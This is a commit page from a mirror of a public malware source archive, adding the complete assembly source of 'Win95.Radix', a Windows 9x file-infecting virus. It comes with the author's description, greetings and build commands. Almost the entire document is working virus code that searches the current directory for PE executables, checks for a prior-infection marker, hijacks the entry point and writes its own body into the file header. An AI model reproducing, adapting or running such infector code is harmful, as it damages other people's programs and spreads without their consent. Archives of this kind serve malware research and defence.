mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2026-06-16 07:49:24 +00:00
Folder structure change, added README
This commit is contained in:
TheDuchy
@@ -0,0 +1,238 @@
|
||||
; Win95.Radix by Radix16[MIONS]
|
||||
; Made in Czech republic
|
||||
;
|
||||
;Hi,
|
||||
;
|
||||
;It's my first Ring3 virus for Win9x.Virus not testing WinNT system.
|
||||
;
|
||||
;Target : PE filez
|
||||
;Virus size : 405(402)
|
||||
;Resident : NO
|
||||
;Polymorhic : NO
|
||||
;
|
||||
;Virus not dangerous, but .....
|
||||
;
|
||||
;Decription AVP:
|
||||
;
|
||||
;http://www.avp.ch/avpve/newexe/win95/radix.stm
|
||||
;
|
||||
;It is a harmless nonmemory resident parasitic Win9x virus. It searches
|
||||
;for PE EXE files in the current directory, then writes itself to the
|
||||
;middle of the file, to not used space at the end of the PE header.
|
||||
;
|
||||
;The virus does not manifest itself in any way. It contains the text:
|
||||
;
|
||||
; Radix16
|
||||
|
||||
;Greets to :
|
||||
; Worf[MIONS]
|
||||
; VirusBuster/29
|
||||
; Prizzy/29A
|
||||
;
|
||||
;
|
||||
;How to build:
|
||||
; tasm32 -ml -m5 radix.asm
|
||||
; tlink32 -Tpe -aa -c -x radix.obj,,, import32
|
||||
; pewrsec radix.exe
|
||||
;
|
||||
;Contacty mee : Radix16@atlas.cz
|
||||
; Radix16.cjb.net
|
||||
|
||||
.386p
|
||||
locals
|
||||
.Model Flat,STDCALL
|
||||
|
||||
extrn ExitProcess :proc
|
||||
extrn GetModuleHandleA : proc
|
||||
|
||||
|
||||
.Data
|
||||
db ?
|
||||
|
||||
.Code
|
||||
|
||||
vStart label byte
|
||||
Start:
|
||||
|
||||
db 68h
|
||||
;Save old eip
|
||||
oldip: dd offset exit
|
||||
pushad
|
||||
Call Next
|
||||
id db 'Radix16'
|
||||
Next:
|
||||
pop ebp
|
||||
|
||||
|
||||
mov esi,KERNEL32+3ch
|
||||
lodsd
|
||||
add eax,KERNEL32
|
||||
xchg eax,esi
|
||||
mov esi,dword ptr [esi+78h]
|
||||
lea esi,dword ptr [esi+1ch+KERNEL32]
|
||||
lodsd
|
||||
mov eax,dword ptr [eax+KERNEL32]
|
||||
add eax,KERNEL32
|
||||
|
||||
push eax
|
||||
push 20060000h
|
||||
push 0h
|
||||
push 1h
|
||||
db 68h
|
||||
currPage:
|
||||
dd FSTGENPAGE
|
||||
push 1000dh
|
||||
call eax
|
||||
pop dword ptr [_VxDCALL0+ebp-X]
|
||||
inc eax
|
||||
jz _exit
|
||||
inc eax
|
||||
;allocation memory
|
||||
push 00020000h or 00040000h
|
||||
push 2h
|
||||
push 80060000h
|
||||
push 00010000h
|
||||
call dword ptr [_VxDCALL0+ebp-X]
|
||||
|
||||
|
||||
mov dword ptr [memory+ebp-X],eax
|
||||
|
||||
push 00020000h or 00040000h or 80000000h or 8h
|
||||
push 0h
|
||||
push 1h
|
||||
push 2h
|
||||
shr eax,12
|
||||
push eax
|
||||
push 00010001h
|
||||
call dword ptr [_VxDCALL0+ebp-X]
|
||||
;Create DTA
|
||||
mov ah,1ah
|
||||
mov edx,dword ptr [memory+ebp-X] ;buffer
|
||||
add edx,1000h
|
||||
call int21
|
||||
|
||||
mov ah,4eh ;FindFirstFile
|
||||
lea edx,[_exe+ebp-X] ;What search
|
||||
xor ecx,ecx ;normal attributes
|
||||
|
||||
tryanother:
|
||||
call int21
|
||||
jc _exit ;is filez ?
|
||||
|
||||
call _infect
|
||||
|
||||
mov ah,4fh ;FindNextFile
|
||||
Jmp tryanother
|
||||
|
||||
_exit:
|
||||
popad
|
||||
ret
|
||||
|
||||
_exe db '*.*',0 ;filez search
|
||||
|
||||
int21:
|
||||
;VxDCALL services
|
||||
push ecx
|
||||
push eax
|
||||
push 002a0010h
|
||||
call dword ptr [_VxDCALL0+ebp-X]
|
||||
ret
|
||||
|
||||
FP: ;Set file pointer
|
||||
mov ah,42h
|
||||
cdq ;xor dx,dx
|
||||
xor cx,cx
|
||||
call int21
|
||||
ret
|
||||
|
||||
|
||||
_infect:
|
||||
|
||||
|
||||
mov edx,dword ptr [memory+ebp-X] ;Name file
|
||||
add edx,101eh
|
||||
|
||||
mov ax,3d02h ;Open File R/W
|
||||
call int21
|
||||
jc quit ;Error ?
|
||||
|
||||
xchg eax,ebx ;FileHandle
|
||||
|
||||
mov ah,3fh ;Read File
|
||||
mov ecx,1000h ;Read 1000h bytes
|
||||
mov edx,dword ptr [memory+ebp-X]
|
||||
call int21
|
||||
jc quitz ;Error ?
|
||||
|
||||
|
||||
mov edi,edx
|
||||
cmp word ptr [edi],'ZM' ;Test Header (EXE)
|
||||
jne quitz ;yes or no ?
|
||||
cmp word ptr [edi+32h],'61' ;Test infection
|
||||
je quitz ;Yes, virus is in file ?
|
||||
mov word ptr [edi+32h],'61' ;No ,Save ID to file
|
||||
add edi,dword ptr [edi+3ch] ;Testing Portable Executable(PE)
|
||||
cmp word ptr [edi],'EP'
|
||||
jne quitz
|
||||
|
||||
|
||||
mov esi,edi
|
||||
mov eax,18h ;Shift image header
|
||||
add ax,word ptr [edi+14h]
|
||||
add edi,eax
|
||||
|
||||
;Search end section
|
||||
movzx cx,word ptr [esi+06h]
|
||||
mov ax,28h
|
||||
mul cx
|
||||
add edi,eax
|
||||
|
||||
mov ecx,dword ptr [esi+2ch]
|
||||
mov dword ptr [esi+54h],ecx
|
||||
|
||||
push edi
|
||||
sub edi,dword ptr [memory+ebp-X]
|
||||
xchg edi,dword ptr [esi+28h]
|
||||
mov eax,dword ptr [esi+34h]
|
||||
add edi,eax
|
||||
shr eax,12
|
||||
mov dword ptr [currPage+ebp-X],eax
|
||||
mov dword ptr [oldip+ebp-X],edi ;Save old EIP
|
||||
pop edi
|
||||
|
||||
|
||||
mov ecx,VirusSize
|
||||
lea esi,[vStart+ebp-X]
|
||||
rep movsb ;CopyVirus
|
||||
|
||||
xor al,al ;SetFilePointer 0=beginning file
|
||||
call FP ;mov al,0
|
||||
|
||||
mov ah,40h ;Write to file
|
||||
mov ecx,1000h
|
||||
mov edx,dword ptr [memory+ebp-X]
|
||||
call int21
|
||||
|
||||
quitz:
|
||||
mov ah,3eh ;CloseFile
|
||||
call int21
|
||||
|
||||
quit:
|
||||
|
||||
ret
|
||||
|
||||
exit:
|
||||
|
||||
vEnd label byte
|
||||
ret
|
||||
VirusSize equ vEnd-vStart
|
||||
KERNEL32 equ 0bff70000h ;Win9X kernel address
|
||||
FSTGENPAGE equ 000400000h/1000h
|
||||
X equ offset id
|
||||
_VxDCALL0 dd ?
|
||||
memory dd ? ;Buffer
|
||||
|
||||
Virual_End:
|
||||
|
||||
ends
|
||||
End Start
|
||||
Reference in New Issue
Block a user